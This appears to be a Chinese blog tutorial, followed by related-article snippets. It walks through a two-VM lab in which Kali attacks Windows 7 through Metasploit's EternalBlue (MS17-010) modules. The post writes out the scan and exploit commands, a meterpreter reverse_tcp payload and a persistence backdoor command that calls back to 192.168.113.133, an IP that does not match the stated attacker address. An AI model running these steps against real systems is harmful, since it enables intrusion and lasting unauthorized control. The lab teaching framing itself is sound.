使用MSF入侵win7并生成后门控制

VSole2021-10-22 08:12:00

攻击主机系统:kali Linux 192.168.102.16

目标主机系统:win7 192.168.102.17

两台主机均在虚拟机,同一局域网内互通。

首先启动Metasploit

命令 Msfconsole

Msf启动后会发现很多模块,对于win7的话我们先尝试永恒之蓝漏洞来入侵,通过命令查找MS17_010漏洞相关的信息:

Search ms17_010

输入命令后查找结果如图所示,找到了四个模块。其中有探测板块和利用板块。

先探测一下有哪些主机存在漏洞。

选择这个辅助模块:

use auxiliary/scanner/smb/smb_ms17_010

设置要探测主机的ip或ip范围:

set RHOSTS 192.168.102.17

输入exploit开始探测。

前面显示+号的就是可能存在漏洞的主机。可看到探测回显我们的主机存在ms17_010漏洞

既然得知存在漏洞那么接下来就是漏洞利用。
选择漏洞利用之前我们需要选择payloads

其实应该使用show options查看一下需要设置的参数,这里忽略了这一步。

查看payloads:

show payloads

选择漏洞利用模块:

use exploit/windows/smb/ms17_010_eternalblue

设置payload:

set payload windows/x64/meterpreter/reverse_tcp

如果不设置RPORT的话,默认使用4444端口监听,这里就不设置了。

输入exploit或者run开始攻击。

可见上图我们已经利用成功
meterpreter常见命令和参数
输入screenshot截屏

接下来通过服务启动生成一个持续性后门。

run persistence -X -i 5 -p 8888 -r 192.168.113.133

漏洞msf
本作品采用《CC 协议》,转载必须注明作者和本文链接
溢出漏洞提权是利用目标操作系统层漏洞进行权限提升,通常步骤是拿到shell后获取目标机器的补丁信息,通过目标的补丁情况获取相对应的漏洞,进行提权
vulnhub之Five86-1的实践
2023-10-16 09:27:53
vulnhub之Five86-1的实践
Metasploit 总结
2020-08-24 11:30:35
此功能当前是选择加入的。此模块利用CVE-2020-9496,并利用未经验证的XML-RPC接口中的Java反序列化方法。最新的OFBiz版本修复了此漏洞。PR #13998 从 adfoster-R7 大大提高Metasploit工具的速度RPC调用。PR #13961 从dwelch-R7 增加了一个新RHOST_HTTP_URL的选择,它允许用户设定值RHOSTS,RPORT以及SSL通过指定单个URL。来自wvu-r7的 PR #14002修复了payload中的回归问题,在该回归中,空白坏字符没有被编码掉。PR #13974从dwelch-R7修正了一个错误认证lib/metasploit/framework/login_scanner/winrm造成的故障与没有接受的“基本”身份验证服务器模块。
当我们渗透一个网站时发现从网站渗透不进去的时候,就可以查看该网站主机开启了哪些端口,来从其开启的端口来进行入侵
在我的一次工作中,我发现一些Windows设备受到MS17-010漏洞的影响。
本篇文章是MongoDB数据库信息泄露漏洞复现,记录了实际中常见的MongoDB数据库未授权访问漏洞并如何使用,主要分为七个部分:MongoDB简介、MongoDB安装、MongoDB基本操作、MongoDB相关工具使用、MongoDB漏洞复现、MongoDB实战和MongoDB防御措施。
前两天朋友分享了一个实验靶场,感觉环境还不错,于是对测试过程进行了详细记录。
vulnhub之Sumo的实践
2023-06-25 09:11:24
今天实践的是vulnhub的Sumo镜像,下载地址,https://download.vulnhub.com/sumo/Sumo.zip,用workstation导入成功,做地址扫描,sudo netdiscover -r 192.168.177.0/24,获取到靶机地址192.168.177.141,继续进行端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.17
VSole
网络安全专家